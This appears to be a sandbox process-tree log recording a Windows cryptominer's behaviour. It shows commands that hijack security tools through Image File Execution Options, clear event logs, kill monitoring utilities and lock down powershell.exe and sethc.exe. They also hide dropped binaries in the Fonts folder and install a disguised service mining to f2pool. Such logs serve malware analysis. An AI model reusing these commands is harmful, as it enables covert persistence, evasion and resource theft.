reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:852

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:584

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
3⤵
PID:1968

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
PID:960

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
PID:1704

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static del all
3⤵
PID:432

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Aliyun
3⤵
PID:2016

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Allowlist
3⤵
PID:1500

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=denylist
3⤵
PID:1388

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3⤵
PID:596

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
3⤵
PID:1616

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
3⤵
PID:2020

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
3⤵
PID:1972

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
3⤵
PID:1592

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=Allow action=permit
3⤵
PID:1284

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
3⤵
PID:1568

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
3⤵
PID:1548

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Aliyun assign=y
3⤵
PID:1388

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im lsars.exe /im lsacs.exe
3⤵
- Kills process with taskkill
PID:1816

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im sqlservr.exe
3⤵
- Kills process with taskkill
PID:564

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
3⤵
- Kills process with WMI
PID:948

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
3⤵
PID:1372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:712

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\sqlservr.exe /d everyone
3⤵
PID:1480

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\csrss.exe /d everyone
3⤵
PID:1140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1820

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\Fonts\csrss.exe
3⤵
- Drops file in Windows directory
PID:1772

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1744

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\lsass.exe
3⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:564

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\lsass.exe /d everyone
3⤵
PID:1320

C:\Windows\SysWOW64\sc.exe
sc stop "Application Layre Gateway Saervice"
3⤵
PID:1632

C:\Windows\SysWOW64\sc.exe
sc delete "Application Layre Gateway Saervice"
3⤵
PID:2000

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im boy.exe
3⤵
- Kills process with taskkill
PID:1232

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\boy.exe
3⤵
PID:1592

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\boy.exe /d everyone
3⤵
PID:1780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im powershell.exe
3⤵
- Kills process with taskkill
PID:1568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1968

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:1384

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:1380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1980

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:1772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:936

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1492

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:2004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:296

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:1672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:1140

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:1444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:1948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1896

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:1788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1652

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:640

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1616

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:1884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:876

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:832

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\sethc.exe /a
3⤵
- Modifies file permissions
PID:1724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:788

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /g Administrators:f
3⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1168

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g Users:r
3⤵
PID:960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1468

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
3⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:336

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /d SERVICE
3⤵
PID:1044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1956

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /d "network service"
3⤵
PID:1228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:432

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g system:r
3⤵
PID:1016

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im wscript.exe
3⤵
- Kills process with taskkill
PID:1396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "windows powershell"
3⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "security"
3⤵
PID:1096

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "system"
3⤵
PID:1568

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:1356

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
2⤵
- Deletes itself
PID:1668

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:1628

\??\c:\windows\Fonts\conhost.exe
"c:\windows\Fonts\conhost.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1236

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2044

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1584

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1916

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2000

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
3⤵
PID:1872

C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:596

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
3⤵
PID:2036

C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
3⤵
PID:1472

C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:844

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
3⤵
PID:544

C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
3⤵
PID:784

C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
3⤵
PID:948

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:1096

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1912

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:2000

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:268

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:1168

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:2016

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2028

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:296

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:784

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1676

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:336

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1948

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:780

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1344

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1284

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1228

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1736

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2036

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1732

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:972

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2044

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1372

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1256

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1168

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:680

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:640

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1816

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:844

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1972

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1468

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1084

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1592

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:336

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:904

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1668

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2032

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:432

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1912

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1948

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1672

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1080

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2004

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1168

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1924

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:936

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1424

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1616

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1632

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1356

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1964

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:336

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1752

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2036

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1872

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1500

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1568

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1140

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1104

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1620

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:916

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:836

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:680

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:844

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1972

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:584

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1084

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1440

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1704

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1056

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1568

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1380

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1356

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1648

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:712

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1284

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1500

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:972

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1080

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1780

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1140

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2004

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:836

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:640

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:844

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1340

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1372

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:524

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:852

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1972

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2032

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1344

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1700

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1256

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1380

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1736

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2012

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:596

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1424

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:576

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1372

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2000

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:852

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1344

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:432

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1704

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2044

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1500

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1568

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1736

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:296

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1880

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1548

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1828

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2020

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1404

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2036

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1496

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1552

